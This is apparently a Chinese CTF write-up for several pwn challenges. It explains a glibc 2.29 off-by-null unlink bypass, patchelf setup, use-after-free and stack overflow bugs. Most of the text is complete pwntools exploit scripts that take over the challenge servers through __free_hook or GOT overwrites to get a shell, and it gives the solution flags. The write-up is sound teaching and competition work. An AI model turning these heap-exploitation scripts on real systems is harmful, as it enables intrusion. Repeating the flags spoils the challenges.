这里首先记录一下love_river
题目给了libc文件,通过命令:
strings libc.so.6 |grep glibc
即可查看libc的版本
2.png
可以看到libc版本为2.29,通过ida静态分析我们还可以看到在edit的时候存在off by null,并且这个edit只能使用一次,show的功能也只能使用一次,然后我们还看到在add的时候会输出chunk块的地址
3.png
4.png
因为程序中存在着off by null因此我们想到的是unlink的操作,但是在libc2.29下unlink新增了一个检查,需要我们绕过
if (!prev_inuse(p)) {
prevsize = prev_size (p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
if (__glibc_unlikely (chunksize(p) != prevsize)) //new
malloc_printerr ("corrupted size vs. prev_size while consolidating");
unlink_chunk (av, p);
}
可以看到这里检查了要释放堆块的prevsize和将要合并的堆块的size是否相等,不相等就crash,因此我们需要伪造一个堆块,具体操作为:
1.申请堆块A,B,C
2.在A中伪造一个fakechunk,size的大小为fake_chunk和chunk B的和,用来bypass这个新的检查,fd和bk指向自身,fd->bk=bk->fd=p
3.释放堆块c,unlink fakechunk+B+C,申请回来fakechunk和chunkB,此时造成了堆重叠,得到了两个B
因为程序直接给了libc文件,因此可以直接patchelf
patchelf安装:
sudo apt install patchelf
patchelf命令:
patchelf --set-interpreter <./ld文件> <bin文件>
例如:
patchelf --set-interpreter ./ld-linux-x86-64.so.2 ./love_river
然后再
patchelf --set-rpath <路径>:<指定的libc文件> <bin文件>
例如:
patchelf --set-rpath ~/:/libc.so.6 ./love_river
查看一下:
m.png
ok完美
1.jpeg
原本按照正常的剧本就可以安安心心的做题了,but...
s.png
输入了size直接crash,直到笔者编写这篇文章的时候还没有解决,那我最后是咋做题的呢?
11.jpeg
我只能打开尘封已久的ubuntu19了,但是应该是系统原因,计算偏移也花费了好长时间,心累。。。
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
# from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
binary = 'love_river'
elf = ELF('love_river')
libc = ELF("./libc.so.6")
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
else:
host = "118.190.133.9"
port = 11000
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def choice(idx):
sla("choice:",str(idx))
def add(size,payload):
choice(1)
sla("Size of info:",str(size))
sla("Info:",payload)
def edit(idx,payload):
choice(4)
sla("index:\n",str(idx))
sla("Info:\n",payload)
def show(idx):
choice(2)
sla("index:\n",str(idx))
def free(idx):
choice(3)
sla("index:\n",str(idx))
def edit1(idx,payload):
choice(6)
sla("index:\n",str(idx))
sla("Info:\n",payload)
for i in range(10):
add(0xf8,"aaaa")
for i in range(5):
free(i)
free(8)
free(9)
free(5)#7
free(6)#8
free(7)#9
for i in range(10):
add(0xf8,"a"*0x7)
ru("0x")
heap_addr = int(p.recv(12),16)
lg("heap_addr",heap_addr)
for i in range(7):
free(i)
show(8)
libc_base = l64()-96-0x10-0x1e4c30
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
sys_addr = libc.sym["system"]+libc_base
payload = p64(0)+p64(0x1f1)
edit(7,payload+p64(heap_addr-0x200)+p64(heap_addr-0x200))
edit1(8,"a"*0xf0+p64(0x1f0))
free(9)
add(0xf8-0x10,"a")#0
for i in range(8):
add(0xf8,"/bin/sh")
free(1)
free(10)
edit(8,p64(free_hook))
add(0xf8,"aaa")
add(0xf8,p64(sys_addr))
free(4)
# gdb.attach(p)
p.interactive()
a.png
flag:
flag{1F_y0u_c0m3_b4cK_wOuLd_y0u_l0ve_m3?}
剩下的几个pwn题没有太大的难度了,直接给出exp:
A+B Problem:
仿照的网鼎杯出的题:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
binary = 'pwnaaa'
elf = ELF('pwnaaa')
libc = ELF("./libc-2.27.so")
context.binary = binary
DEBUG = 0
if DEBUG:
p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
host = "118.190.133.9"
port = 11004
p = remote(host,port)
o_g = [0x4f2c5,0x4f322,0x10a38c]
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
payload = """
int main(){
int a;
int b;
int *free_hook;
int base;
int one;
char *buf;
b = &a;
base = b - 0x551fd8;
free_hook = 0x3ed8e8+base;
one = base+0x4f440;
*free_hook = one;
free("/bin/sh");
}
"""
# p.recv()
# gdb.attach(p)
payload = payload.replace("\n"," ")
p.sendline(payload)
p.interactive()
flag:
flag{A001_A+B_H4ck_pr0bl3m}
Note:
这题还是不错的,但是Aidai师傅说放错了题,这题简单了,确实有点白给了
off by null然后unlink
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
binary = 'Note'
elf = ELF('Note')
libc = elf.libc
context.binary = binary
DEBUG = 1
if DEBUG:
p = process(binary)
else:
host = "118.190.133.9"
port = 11001
p = remote(host,port)
o_g = [0x4f2c5,0x4f322,0x10a38c]
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def choice(idx):
sla("choice",str(idx))
def add():
choice(1)
def free(idx):
choice(3)
sla("index:\n",str(idx))
def show(idx):
choice(2)
sla("index:\n",str(idx))
def edit(idx,payload):
choice(4)
sla("index:\n",str(idx))
sla("Content:\n",payload)
for i in range(10):
add()
for i in range(5):
free(i)
free(8)
free(9)
free(5)#7
free(6)#8
free(7)#9
for i in range(10):
add()
for i in range(7):
free(i)
free(7)
edit(8,"a"*0x1f0+p64(0x200+0x200))
free(9)
for i in range(7):
add()
add()#7
show(8)
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = 0x3ed8e8+libc_base
sys_addr = 0x4f440+libc_base
add()
free(0)
free(8)
# add()
edit(9,p64(free_hook))
sla("choice","1")
sla("choice","1")
edit(8,p64(sys_addr))
edit(1,"/bin/sh\x00")
free(1)
# gdb.attach(p)
p.interactive()
flag:
flag{T3nCent_N3ws_s4id_On3Note_v3ry_ha0shi}
Newwave:
uaf漏洞打存有数组指针的地方:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Author__ = 'cnitlrt'
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
binary = './New_Wave'
elf = ELF('./New_Wave')
libc = elf.libc
context.binary = binary
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
DEBUG = 0
if DEBUG:
p = process(binary)
else:
host = "118.190.133.9"
port = 11002
p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + " => 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def choice(idx):
sla("Input your choice:\n",str(idx))
def add(size):
choice(1)
sla("Size:\n",str(size))
def show(idx):
choice(2)
sla("index:\n",str(idx))
def free(idx):
choice(4)
sla("index:\n",str(idx))
def edit(idx,payload):
choice(3)
sla("index:\n",str(idx))
sa("Info:\n",payload)
add(0x68)#0
add(0x68)#1
free(0)
edit(0,p64(0x6020ad))
add(0x68)
add(0x68)
edit(3,"a"*0x3+p64(0x0000006800000068)*2+p64(0)*2+p64(elf.got["free"])*2+p64(elf.got["atoi"])+p64(0x6020bd))
show(1)
libc_base = l64()-libc.sym["free"]
lg("libc_base",libc_base)
sys_addr = libc.sym["system"]+libc_base
edit(2,p64(sys_addr))
# gdb.attach(p)
p.interactive()
flag
flag{Surg3_0n_y0ung_g3ner4tion5_A_tuberosum_Rottl_ex_Spreng}
Y.J.Aickson's Calculator
劫持v5为0x1BF52,然后同时需要v8不等于0x1BF52
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Author__ = 'cnitlrt'
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
binary = 'aaa'
elf = ELF('aaa')
libc = elf.libc
context.binary = binary
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
DEBUG = 0
if DEBUG:
p = process(binary)
else:
host = "pwn.iostream.site"
port = 2333
p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + " => 0x%x" % data)
se = lambda payload: p.send(payload)
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
p.recv()
p.sendline("1")
p.sendline("2")
p.sendline("+"+p64(0x1BF52))
# gdb.attach(p)
p.interactive()
flag:
flag{wh1t3_g1v3_stAck_0v3rf10w!}
Pwn_WarmUp
签到题,没啥好说的,连上就有
flag:
flag{Welc0m3_to_my_Pwn_w0r1d!}
网友评论